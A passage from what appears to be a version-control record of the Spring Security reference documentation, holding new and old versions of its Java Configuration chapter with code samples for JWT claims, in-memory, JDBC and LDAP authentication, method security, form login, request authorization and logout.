null));\n```\n\n[[oauth2resourceserver-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).restOperations(rest).build());\n return jwtDecoder;\n}\n```\n\n[[jc-authentication]]\n== Authentication\n\nThus far we have only taken a look at the most basic authentication configuration.\nLet's take a look at a few slightly more advanced options for configuring authentication.\n\n[[jc-authentication-inmemory]]\n=== In-Memory Authentication\n\nWe have already seen an example of configuring in-memory authentication for a single user.\nBelow is an example to configure multiple users:\n\n[source,java]\n----\n@Bean\npublic UserDetailsService userDetailsService() throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\treturn manager;\n}\n----\n\n[[jc-authentication-jdbc]]\n=== JDBC Authentication\n\nYou can find the updates to support JDBC based authentication.\nThe example below assumes that you have already defined a `DataSource` within your application.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/jdbc[jdbc-javaconfig] sample provides a complete example of using JDBC based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tauth\n\t\t.jdbcAuthentication()\n\t\t\t.dataSource(dataSource)\n\t\t\t.withDefaultSchema()\n\t\t\t.withUser(users.username(\"user\").password(\"password\").roles(\"USER\"))\n\t\t\t.withUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\"));\n}\n----\n\n=== LDAP Authentication\n\nYou can find the updates to support LDAP based authentication.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/ldap[ldap-javaconfig] sample provides a complete example of using LDAP based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\tauth\n\t\t.ldapAuthentication()\n\t\t\t.userDnPatterns(\"uid={0},ou=people\")\n\t\t\t.groupSearchBase(\"ou=groups\");\n}\n----\n\nThe example above uses the following LDIF and an embedded Apache DS LDAP instance.\n\n.users.ldif\n----\ndn: ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: groups\n\ndn: ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: people\n\ndn: uid=admin,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Rod Johnson\nsn: Johnson\nuid: admin\nuserPassword: password\n\ndn: uid=user,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Dianne Emu\nsn: Emu\nuid: user\nuserPassword: password\n\ndn: cn=user,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: user\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\nuniqueMember: uid=user,ou=people,dc=springframework,dc=org\n\ndn: cn=admin,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: admin\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\n----\n\n[[jc-authentication-authenticationprovider]]\n=== AuthenticationProvider\n\nYou can define custom authentication by exposing a custom `AuthenticationProvider` as a bean.\nFor example, the following will customize authentication assuming that `SpringAuthenticationProvider` implements `AuthenticationProvider`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated\n\n[source,java]\n----\n@Bean\npublic SpringAuthenticationProvider springAuthenticationProvider() {\n\treturn new SpringAuthenticationProvider();\n}\n----\n\n[[jc-authentication-userdetailsservice]]\n=== UserDetailsService\n\nYou can define custom authentication by exposing a custom `UserDetailsService` as a bean.\nFor example, the following will customize authentication assuming that `SpringDataUserDetailsService` implements `UserDetailsService`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated and no `AuthenticationProviderBean` is defined.\n\n[source,java]\n----\n@Bean\npublic SpringDataUserDetailsService springDataUserDetailsService() {\n\treturn new SpringDataUserDetailsService();\n}\n----\n\nYou can also customize how passwords are encoded by exposing a `PasswordEncoder` as a bean.\nFor example, if you use bcrypt you can add a bean definition as shown below:\n\n[source,java]\n----\n@Bean\npublic BCryptPasswordEncoder passwordEncoder() {\n\treturn new BCryptPasswordEncoder();\n}\n----\n\n== Multiple HttpSecurity\n\nWe can configure multiple HttpSecurity instances just as we can have multiple `<http>` blocks.\nThe key is to extend the `WebSecurityConfigurerAdapter` multiple times.\nFor example, the following is an example of having a different configuration for URL's that start with `\/api\/`.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class MultiHttpSecurityConfig {\n\t@Bean <1>\n\tpublic UserDetailsService userDetailsService() throws Exception {\n\t\t\/\/ ensure the passwords are encoded properly\n\t\tUserBuilder users = User.withDefaultPasswordEncoder();\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\t\treturn manager;\n\t}\n\n\t@Configuration\n\t@Order(1) <2>\n\tpublic static class ApiWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter {\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.antMatcher(\"\/api\/**\") <3>\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().hasRole(\"ADMIN\")\n\t\t\t )\n\t\t\t\t.httpBasic(withDefaults());\n\t\t}\n\t}\n\n\t@Configuration <4>\n\tpublic static class FormLoginWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().authenticated()\n\t\t\t\t)\n\t\t\t\t.formLogin(withDefaults());\n\t\t}\n\t}\n}\n----\n\n<1> Configure Authentication as normal\n<2> Create an instance of `WebSecurityConfigurerAdapter` that contains `@Order` to specify which `WebSecurityConfigurerAdapter` should be considered first.\n<3> The `http.antMatcher` states that this `HttpSecurity` will only be applicable to URLs that start with `\/api\/`\n<4> Create another instance of `WebSecurityConfigurerAdapter`.\nIf the URL does not start with `\/api\/` this configuration will be used.\nThis configuration is considered after `ApiWebSecurityConfigurationAdapter` since it has an `@Order` value after `1` (no `@Order` defaults to last).\n\n\n[[jc-method]]\n== Method Security\n\nFrom version 2.0 onwards Spring Security has improved support substantially for adding security to your service layer methods.\nIt provides support for JSR-250 annotation security as well as the framework's original `@Secured` annotation.\nFrom 3.0 you can also make use of new <<el-access,expression-based annotations>>.\nYou can apply security to a single bean, using the `intercept-methods` element to decorate the bean declaration, or you can secure multiple beans across the entire service layer using the AspectJ style pointcuts.\n\n=== EnableGlobalMethodSecurity\n\nWe can enable annotation-based security using the `@EnableGlobalMethodSecurity` annotation on any `@Configuration` instance.\nFor example, the following would enable Spring Security's `@Secured` annotation.\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(securedEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nAdding an annotation to a method (on a class or interface) would then limit the access to that method accordingly.\nSpring Security's native annotation support defines a set of attributes for the method.\nThese will be passed to the AccessDecisionManager for it to make the actual decision:\n\n[source,java]\n----\npublic interface BankService {\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account readAccount(Long id);\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account[] findAccounts();\n\n@Secured(\"ROLE_TELLER\")\npublic Account post(Account account, double amount);\n}\n----\n\nSupport for JSR-250 annotations can be enabled using\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(jsr250Enabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nThese are standards-based and allow simple role-based constraints to be applied but do not have the power Spring Security's native annotations.\nTo use the new expression-based syntax, you would use\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nand the equivalent Java code would be\n\n[source,java]\n----\npublic interface BankService {\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account readAccount(Long id);\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account[] findAccounts();\n\n@PreAuthorize(\"hasAuthority('ROLE_TELLER')\")\npublic Account post(Account account, double amount);\n}\n----\n\n=== GlobalMethodSecurityConfiguration\n\nSometimes you may need to perform operations that are more complicated than are possible with the `@EnableGlobalMethodSecurity` annotation allow.\nFor these instances, you can extend the `GlobalMethodSecurityConfiguration` ensuring that the `@EnableGlobalMethodSecurity` annotation is present on your subclass.\nFor example, if you wanted to provide a custom `MethodSecurityExpressionHandler`, you could use the following configuration:\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig extends GlobalMethodSecurityConfiguration {\n\t@Override\n\tprotected MethodSecurityExpressionHandler createExpressionHandler() {\n\t\t\/\/ ... create and return custom MethodSecurityExpressionHandler ...\n\t\treturn expressionHandler;\n\t}\n}\n----\n\nFor additional information about methods that can be overridden, refer to the `GlobalMethodSecurityConfiguration` Javadoc.\n\n== Post Processing Configured Objects\n\nSpring Security's Java Configuration does not expose every property of every object that it configures.\nThis simplifies the configuration for a majority of users.\nAfterall, if every property was exposed, users could use standard bean configuration.\n\nWhile there are good reasons to not directly expose every property, users may still need more advanced configuration options.\nTo address this Spring Security introduces the concept of an `ObjectPostProcessor` which can be used to modify or replace many of the Object instances created by the Java Configuration.\nFor example, if you wanted to configure the `filterSecurityPublishAuthorizationSuccess` property on `FilterSecurityInterceptor` you could use the following:\n\n[source,java]\n----\n@Override\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t\tauthorizeRequests\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.withObjectPostProcessor(new ObjectPostProcessor<FilterSecurityInterceptor>() {\n\t\t\t\t\tpublic <O extends FilterSecurityInterceptor> O postProcess(\n\t\t\t\t\t\t\tO fsi) {\n\t\t\t\t\t\tfsi.setPublishAuthorizationSuccess(true);\n\t\t\t\t\t\treturn fsi;\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t);\n}\n----\n\n[[jc-custom-dsls]]\n== Custom DSLs\n\nYou can provide your own custom DSLs in Spring Security.\nFor example, you might have something that looks like this:\n\n[source,java]\n----\npublic class MyCustomDsl extends AbstractHttpConfigurer<MyCustomDsl, HttpSecurity> {\n\tprivate boolean flag;\n\n\t@Override\n\tpublic void init(H http) throws Exception {\n\t\t\/\/ any method that adds another configurer\n\t\t\/\/ must be done in the init method\n\t\thttp.csrf().disable();\n\t}\n\n\t@Override\n\tpublic void configure(H http) throws Exception {\n\t\tApplicationContext context = http.getSharedObject(ApplicationContext.class);\n\n\t\t\/\/ here we lookup from the ApplicationContext. You can also just create a new instance.\n\t\tMyFilter myFilter = context.getBean(MyFilter.class);\n\t\tmyFilter.setFlag(flag);\n\t\thttp.addFilterBefore(myFilter, UsernamePasswordAuthenticationFilter.class);\n\t}\n\n\tpublic MyCustomDsl flag(boolean value) {\n\t\tthis.flag = value;\n\t\treturn this;\n\t}\n\n\tpublic static MyCustomDsl customDsl() {\n\t\treturn new MyCustomDsl();\n\t}\n}\n----\n\nNOTE: This is actually how methods like `HttpSecurity.authorizeRequests()` are implemented.\n\nThe custom DSL can then be used like this:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl())\n\t\t\t\t.flag(true)\n\t\t\t\t.and()\n\t\t\t...;\n\t}\n}\n----\n\nThe code is invoked in the following order:\n\n* Code in `Config`s configure method is invoked\n* Code in `MyCustomDsl`s init method is invoked\n* Code in `MyCustomDsl`s configure method is invoked\n\nIf you want, you can have `WebSecurityConfiguerAdapter` add `MyCustomDsl` by default by using `SpringFactories`.\nFor example, you would create a resource on the classpath named `META-INF\/spring.factories` with the following contents:\n\n.META-INF\/spring.factories\n----\norg.springframework.security.config.annotation.web.configurers.AbstractHttpConfigurer = sample.MyCustomDsl\n----\n\nUsers wishing to disable the default can do so explicitly.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class Config extends WebSecurityConfigurerAdapter {\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n\t\thttp\n\t\t\t.apply(customDsl()).disable()\n\t\t\t...;\n\t}\n}\n----\n","old_contents":"\n[[jc]]\n= Java Configuration\n\nGeneral support for https:\/\/docs.spring.io\/spring\/docs\/3.1.x\/spring-framework-reference\/html\/beans.html#beans-java[Java Configuration] was added to Spring Framework in Spring 3.1.\nSince Spring Security 3.2 there has been Spring Security Java Configuration support which enables users to easily configure Spring Security without the use of any XML.\n\nIf you are familiar with the <<ns-config>> then you should find quite a few similarities between it and the Security Java Configuration support.\n\nNOTE: Spring Security provides https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig[lots of sample applications] which demonstrate the use of Spring Security Java Configuration.\n\n== Hello Web Security Java Configuration\n\nThe first step is to create our Spring Security Java Configuration.\nThe configuration creates a Servlet Filter known as the `springSecurityFilterChain` which is responsible for all the security (protecting the application URLs, validating submitted username and passwords, redirecting to the log in form, etc) within your application.\nYou can find the most basic example of a Spring Security Java Configuration below:\n\n[[jc-hello-wsca]]\n[source,java]\n----\nimport org.springframework.beans.factory.annotation.Autowired;\n\nimport org.springframework.context.annotation.*;\nimport org.springframework.security.config.annotation.authentication.builders.*;\nimport org.springframework.security.config.annotation.web.configuration.*;\n\n@EnableWebSecurity\npublic class WebSecurityConfig {\n\n\t@Bean\n\tpublic UserDetailsService userDetailsService() {\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(User.withDefaultPasswordEncoder().username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\treturn manager;\n\t}\n}\n----\n\nThere really isn't much to this configuration, but it does a lot.\nYou can find a summary of the features below:\n\n* Require authentication to every URL in your application\n* Generate a login form for you\n* Allow the user with the *Username* _user_ and the *Password* _password_ to authenticate with form based authentication\n* Allow the user to logout\n* https:\/\/en.wikipedia.org\/wiki\/Cross-site_request_forgery[CSRF attack] prevention\n* https:\/\/en.wikipedia.org\/wiki\/Session_fixation[Session Fixation] protection\n* Security Header integration\n** https:\/\/en.wikipedia.org\/wiki\/HTTP_Strict_Transport_Security[HTTP Strict Transport Security] for secure requests\n** https:\/\/msdn.microsoft.com\/en-us\/library\/ie\/gg622941(v=vs.85).aspx[X-Content-Type-Options] integration\n** Cache Control (can be overridden later by your application to allow caching of your static resources)\n** https:\/\/msdn.microsoft.com\/en-us\/library\/dd565647(v=vs.85).aspx[X-XSS-Protection] integration\n** X-Frame-Options integration to help prevent https:\/\/en.wikipedia.org\/wiki\/Clickjacking[Clickjacking]\n* Integrate with the following Servlet API methods\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getRemoteUser()[HttpServletRequest#getRemoteUser()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getUserPrincipal()[HttpServletRequest#getUserPrincipal()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#isUserInRole(java.lang.String)[HttpServletRequest#isUserInRole(java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#login(java.lang.String,%20java.lang.String)[HttpServletRequest#login(java.lang.String, java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#logout()[HttpServletRequest#logout()]\n\n=== AbstractSecurityWebApplicationInitializer\n\nThe next step is to register the `springSecurityFilterChain` with the war.\nThis can be done in Java Configuration with https:\/\/docs.spring.io\/spring\/docs\/3.2.x\/spring-framework-reference\/html\/mvc.html#mvc-container-config[Spring's WebApplicationInitializer support] in a Servlet 3.0+ environment.\nNot suprisingly, Spring Security provides a base class `AbstractSecurityWebApplicationInitializer` that will ensure the `springSecurityFilterChain` gets registered for you.\nThe way in which we use `AbstractSecurityWebApplicationInitializer` differs depending on if we are already using Spring or if Spring Security is the only Spring component in our application.\n\n* <<abstractsecuritywebapplicationinitializer-without-existing-spring>> - Use these instructions if you are not using Spring already\n* <<abstractsecuritywebapplicationinitializer-with-spring-mvc>> - Use these instructions if you are already using Spring\n\n=== AbstractSecurityWebApplicationInitializer without Existing Spring\n\nIf you are not using Spring or Spring MVC, you will need to pass in the `WebSecurityConfig` into the superclass to ensure the configuration is picked up.\nYou can find an example below:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n\tpublic SecurityWebApplicationInitializer() {\n\t\tsuper(WebSecurityConfig.class);\n\t}\n}\n----\n\nThe `SecurityWebApplicationInitializer` will do the following things:\n\n* Automatically register the springSecurityFilterChain Filter for every URL in your application\n* Add a ContextLoaderListener that loads the <<jc-hello-wsca,WebSecurityConfig>>.\n\n=== AbstractSecurityWebApplicationInitializer with Spring MVC\n\nIf we were using Spring elsewhere in our application we probably already had a `WebApplicationInitializer` that is loading our Spring Configuration.\nIf we use the previous configuration we would get an error.\nInstead, we should register Spring Security with the existing `ApplicationContext`.\nFor example, if we were using Spring MVC our `SecurityWebApplicationInitializer` would look something like the following:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n}\n----\n\nThis would simply only register the springSecurityFilterChain Filter for every URL in your application.\nAfter that we would ensure that `WebSecurityConfig` was loaded in our existing ApplicationInitializer.\nFor example, if we were using Spring MVC it would be added in the `getRootConfigClasses()`\n\n[[message-web-application-inititializer-java]]\n[source,java]\n----\npublic class MvcWebApplicationInitializer extends\n\t\tAbstractAnnotationConfigDispatcherServletInitializer {\n\n\t@Override\n\tprotected Class<?>[] getRootConfigClasses() {\n\t\treturn new Class[] { WebSecurityConfig.class };\n\t}\n\n\t\/\/ ... other overrides ...\n}\n----\n\n[[jc-httpsecurity]]\n== HttpSecurity\n\nThus far our <<jc-hello-wsca,WebSecurityConfig>> only contains information about how to authenticate our users.\nHow does Spring Security know that we want to require all users to be authenticated?\nHow does Spring Security know we want to support form based authentication?\nActually, there is an configuration class that is being invoked behind the scenes called `WebSecurityConfigurerAdapter`.\nIt has a method called `configure` with the following default implementation:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(withDefaults())\n\t\t.httpBasic(withDefaults());\n}\n----\n\nThe default configuration above:\n\n* Ensures that any request to our application requires the user to be authenticated\n* Allows users to authenticate with form based login\n* Allows users to authenticate with HTTP Basic authentication\n\nYou will notice that this configuration is quite similar the XML Namespace configuration:\n\n[source,xml]\n----\n<http>\n\t<intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n\t<form-login \/>\n\t<http-basic \/>\n<\/http>\n----\n\n[[jc-form]]\n== Java Configuration and Form Login\nYou might be wondering where the login form came from when you were prompted to log in, since we made no mention of any HTML files or JSPs.\nSince Spring Security's default configuration does not explicitly set a URL for the login page, Spring Security generates one automatically, based on the features that are enabled and using standard values for the URL which processes the submitted login, the default target URL the user will be sent to after logging in and so on.\n\nWhile the automatically generated log in page is convenient to get up and running quickly, most applications will want to provide their own login page.\nWhen we want to change the default configuration, we can customize the `WebSecurityConfigurerAdapter` that we mentioned earlier by extending it like so:\n\n[source,java]\n----\npublic class WebSecurityConfig extends WebSecurityConfigurerAdapter {\n\t\/\/ ...\n}\n----\n\nAnd then override the `configure` method as seen below:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(formLogin ->\n\t\t formLogin\n\t\t\t .loginPage(\"\/login\") \/\/ <1>\n\t\t\t .permitAll() \/\/ <2>\n\t );\n}\n----\n\n<1> The updated configuration specifies the location of the log in page.\n<2> We must grant all users (i.e. unauthenticated users) access to our log in page.\nThe `formLogin().permitAll()` method allows granting access to all users for all URLs associated with form based log in.\n\nAn example log in page implemented with JSPs for our current configuration can be seen below:\n\nNOTE: The login page below represents our current configuration.\nWe could easily update our configuration if some of the defaults do not meet our needs.\n\n[source,html]\n----\n<c:url value=\"\/login\" var=\"loginUrl\"\/>\n<form action=\"${loginUrl}\" method=\"post\"> <1>\n\t<c:if test=\"${param.error != null}\"> <2>\n\t\t<p>\n\t\t\tInvalid username and password.\n\t\t<\/p>\n\t<\/c:if>\n\t<c:if test=\"${param.logout != null}\"> <3>\n\t\t<p>\n\t\t\tYou have been logged out.\n\t\t<\/p>\n\t<\/c:if>\n\t<p>\n\t\t<label for=\"username\">Username<\/label>\n\t\t<input type=\"text\" id=\"username\" name=\"username\"\/>\t<4>\n\t<\/p>\n\t<p>\n\t\t<label for=\"password\">Password<\/label>\n\t\t<input type=\"password\" id=\"password\" name=\"password\"\/>\t<5>\n\t<\/p>\n\t<input type=\"hidden\" <6>\n\t\tname=\"${_csrf.parameterName}\"\n\t\tvalue=\"${_csrf.token}\"\/>\n\t<button type=\"submit\" class=\"btn\">Log in<\/button>\n<\/form>\n----\n\n<1> A POST to the `\/login` URL will attempt to authenticate the user\n<2> If the query parameter `error` exists, authentication was attempted and failed\n<3> If the query parameter `logout` exists, the user was successfully logged out\n<4> The username must be present as the HTTP parameter named __username__\n<5> The password must be present as the HTTP parameter named __password__\n<6> We must <<csrf-include-csrf-token>> To learn more read the <<csrf>> section of the reference\n\n[[jc-authorize-requests]]\n== Authorize Requests\nOur examples have only required users to be authenticated and have done so for every URL in our application.\nWe can specify custom requirements for our URLs by adding multiple children to our `http.authorizeRequests()` method.\nFor example:\n\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests -> \/\/ <1>\n\t\t authorizeRequests\n\t\t\t .antMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t .antMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t .antMatchers(\"\/db\/**\").access(\"hasRole('ADMIN') and hasRole('DBA')\") \/\/ <4>\n\t\t\t .anyRequest().authenticated() \/\/ <5>\n\t\t)\n\t\t.formLogin(withDefaults());\n}\n----\n\n<1> There are multiple children to the `http.authorizeRequests()` method each matcher is considered in the order they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on only requires that the user be authenticated\n\n[[jc-logout]]\n== Handling Logouts\n\nWhen using the `{security-api-url}org\/springframework\/security\/config\/annotation\/web\/configuration\/WebSecurityConfigurerAdapter.html[WebSecurityConfigurerAdapter]`, logout capabilities are automatically applied.\nThe default is that accessing the URL `\/logout` will log the user out by:\n\n- Invalidating the HTTP Session\n- Cleaning up any RememberMe authentication that was configured\n- Clearing the `SecurityContextHolder`\n- Redirect to `\/login?logout`\n\nSimilar to configuring login capabilities, however, you also have various options to further customize your logout requirements:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.logout(logout -> \/\/ <1>\n\t\t logout\n\t\t\t .logoutUrl(\"\/my\/logout\") \/\/ <2>\n\t\t\t .logoutSuccessUrl(\"\/my\/index\") \/\/ <3>\n\t\t\t .logoutSuccessHandler(logoutSuccessHandler) \/\/ <4>\n\t\t\t .invalidateHttpSession(true) \/\/ <5>\n\t\t\t .addLogoutHandler(logoutHandler) \/\/ <6>\n\t\t\t .deleteCookies(cookieNamesToClear) \/\/ <7>\n\t\t)\n\t\t...\n}\n----\n\n<1> Provides logout support.\nThis is automatically applied when using `WebSecurityConfigurerAdapter`.\n<2> The URL that triggers log out to occur (default is `\/logout`).\nIf CSRF protection is enabled (default), then the request must also be a POST.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutUrl-java.lang.String-[JavaDoc].\n<3> The URL to redirect to after logout has occurred.\nThe default is `\/login?logout`.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessUrl-java.lang.String-[JavaDoc].\n<4> Let's you specify a custom `LogoutSuccessHandler`.\nIf this is specified, `logoutSuccessUrl()` is ignored.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessHandler-org.springframework.security.web.authentication.logout.LogoutSuccessHandler-[JavaDoc].\n<5> Specify whether to invalidate the `HttpSession` at the time of logout.\nThis is *true* by default.\nConfigures the `SecurityContextLogoutHandler` under the covers.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#invalidateHttpSession-boolean-[JavaDoc].\n<6> Adds a `LogoutHandler`.\n`SecurityContextLogoutHandler` is added as the last `LogoutHandler` by default.\n<7> Allows specifying the names of cookies to be removed on logout success.\nThis is a shortcut for adding a `CookieClearingLogoutHandler` explicitly.\n\n[NOTE]\n===\nLogouts can of course also be configured using the XML Namespace notation.\nPlease see the documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section for further details.\n===\n\nGenerally, in order to customize logout functionality, you can add\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nand\/or\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutSuccessHandler.html[LogoutSuccessHandler]`\nimplementations.\nFor many common scenarios, these handlers are applied under the\ncovers when using the fluent API.\n\n[[jc-logout-handler]]\n=== LogoutHandler\n\nGenerally, `{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nimplementations indicate classes that are able to participate in logout handling.\nThey are expected to be invoked to perform necessary clean-up.\nAs such they should\nnot throw exceptions.\nVarious implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/PersistentTokenBasedRememberMeServices.html[PersistentTokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/TokenBasedRememberMeServices.html[TokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/CookieClearingLogoutHandler.html[CookieClearingLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/csrf\/CsrfLogoutHandler.html[CsrfLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SecurityContextLogoutHandler.html[SecurityContextLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/HeaderWriterLogoutHandler.html[HeaderWriterLogoutHandler]\n\nPlease see <<remember-me-impls>> for 